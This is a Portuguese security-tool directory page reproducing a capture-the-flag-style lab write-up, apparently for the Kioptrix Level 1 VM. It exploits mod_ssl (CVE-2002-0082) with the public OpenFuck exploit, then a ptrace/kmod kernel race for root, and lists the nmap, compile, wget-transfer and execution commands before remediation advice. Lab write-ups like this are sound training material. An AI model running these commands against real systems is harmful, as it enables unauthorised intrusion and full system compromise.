Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Binary-Exploitation-and-Kernel-Escalation — Acesso root garantido ao identificar e explorar más configurações e software desatualizado. Vulnerabilidade de estouro de buffer em uma versão desatualizada do mod_ssl (CVE-2002-0082). A escalada de privilégios foi posteriormente alcançada ao explorar uma condição de corrida no utilitário "ptrace" do kernel Linux (CVE-2003-0127), | Kitploit
Ferramentas/GitHubGitHub/anilkashyap01/binary-exploitation-and-kernel-escalation
Escalada de PrivilégiosReconhecimentoEscaneamento de PortasAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Acesso root garantido ao identificar e explorar más configurações e software desatualizado. Vulnerabilidade de estouro de buffer em uma versão desatualizada do mod_ssl (CVE-2002-0082). A escalada de privilégios foi posteriormente alcançada ao explorar uma condição de corrida no utilitário "ptrace" do kernel Linux (CVE-2003-0127),

Labs e Prática
GitHubanilkashyap01/binary-exploitation-and-kernel-escalation

Binary-Exploitation-and-Kernel-Escalation

Ver Repositório
3há 4 mesesAinda não revisado
Compartilhar

Exploração Binária e Escalação de Kernel

Acesso root seguro foi obtido identificando e explorando configurações incorretas e software desatualizado. Vulnerabilidade de buffer overflow em uma versão desatualizada do mod_ssl (CVE-2002-0082). A escalação de privilégios foi posteriormente alcançada ao explorar uma condição de corrida no utilitário "ptrace" do kernel Linux (CVE-2003-0127).

Fase 1: Reconhecimento & Enumeração

O primeiro passo foi identificar o endereço IP do alvo na sub-rede 192.168.56.0/24.

Descoberta de Hosts:

sudo nmap -sn 192.168.56.0/24

Resultado: O alvo foi identificado em 192.168.56.105.

Varredura de Portas e Enumeração de Serviços: Uma varredura Nmap abrangente foi executada para identificar portas abertas, serviços em execução e detalhes do sistema operacional.

sudo nmap -sS -sV -O -p- -oA lab_full_scan1 192.168.56.105

Principais Descobertas:

root@kitploit:~
Porta 80/tcp & 443/tcp: Rodando Apache httpd 1.3.20 com mod_ssl/2.8.4 e OpenSSL/0.9.6b.

Porta 22/tcp: Rodando OpenSSH 2.9p2.

Porta 139/tcp: Rodando Samba smbd.

Detecção de SO: Kernel Linux 2.4.X (provavelmente 2.4.9 - 2.4.18).

A versão desatualizada do Apache e do mod_ssl imediatamente apresentou um vetor de alta probabilidade para acesso inicial.

Fase 2: Acesso Inicial (Exploração)

O Exploit Database via searchsploit confirmou que o mod_ssl 2.8.4 é vulnerável a um conhecido Remote Buffer Overflow.

searchsploit mod_ssl 2.8

Identifiquei o exploit OpenFuckV2.c (EDB-ID: 47080) como o payload mais confiável para esta vulnerabilidade. Mirei o exploit para o host local e o compilei com as bibliotecas criptográficas necessárias.

Compilação do Exploit:

searchsploit -m 47080 gcc -o OpenFuck 47080.c -lcrypto

Executar o binário compilado sem argumentos forneceu uma lista de offsets suportados. Ao combinar o offset com o SO específico do alvo e a versão do Apache (Red-Hat Linux, Apache 1.3.20), determinei que o offset correto era 0x6b.

Execução:

./OpenFuck 0x6b 192.168.56.105 443 -c 40

O exploit forçou com sucesso um buffer overflow, concedendo um shell de baixo privilégio como o usuário apache.

bash-2.05$ whoami apache

Fase 3: Escalação de Privilégios

Nota sobre a Metodologia: O exploit OpenFuck tenta baixar automaticamente um payload secundário de escalação de privilégios (ptrace-kmod.c) de um servidor remoto usando wget. No entanto, como o ambiente alvo não tinha acesso à internet de saída, esta etapa automatizada falhou (resolvendo para Host not found). Mudei para enumeração e exploração manual.

Enumeração do Sistema:

bash-2.05$ uname -a Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

O sistema estava executando uma versão de kernel altamente vulnerável: 2.4.7-10. Pesquisar por exploits visando este kernel Linux específico revelou uma vulnerabilidade local de escalação de privilégios utilizando ptrace/kmod.

Preparação do Payload: Localizei o exploit localmente (EDB-ID: 3) e o hospedei via um servidor HTTP Python na máquina atacante para facilitar a transferência.

Atacante Host:

searchsploit -m 3 python3 -m http.server 8000

Máquina Alvo:

cd /tmp wget http://192.168.56.1:8000/3.c

O código fonte do 3.c foi transferido com sucesso para o diretório /tmp do alvo, compilei e executei nativamente na máquina alvo.

Execução e Comprometimento Root:

gcc 3.c -o exploit

./exploit

whoami

root

id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

A condição de corrida ptrace foi explorada com sucesso, escalando privilégios do daemon apache para root. O comprometimento total do sistema foi alcançado.

Fase 4: Remediação

Para proteger este sistema contra as vulnerabilidades exploradas:

  1. Atualizar Serviços Web: O servidor Apache deve ser atualizado para as últimas versões estáveis para corrigir a vulnerabilidade de buffer overflow CVE-2002-0082, que permite execução remota de código não autenticada.

  2. Patches de Kernel: O kernel Linux (2.4.7-10) é vulnerável a múltiplos exploits locais de escalação de privilégios, incluindo a condição de corrida ptrace (kmod). O kernel do sistema operacional deve ser atualizado para uma versão moderna e suportada.

  3. Segmentação de Rede & Filtragem de Saída: O servidor deve ser colocado atrás de um firewall que restrinja tráfego de saída desnecessário. Embora o wget automatizado tenha falhado neste laboratório offline, a filtragem de saída preveniria que aplicações web comprometidas puxem payloads maliciosos secundários da internet em um ambiente real.

Baixar ferramenta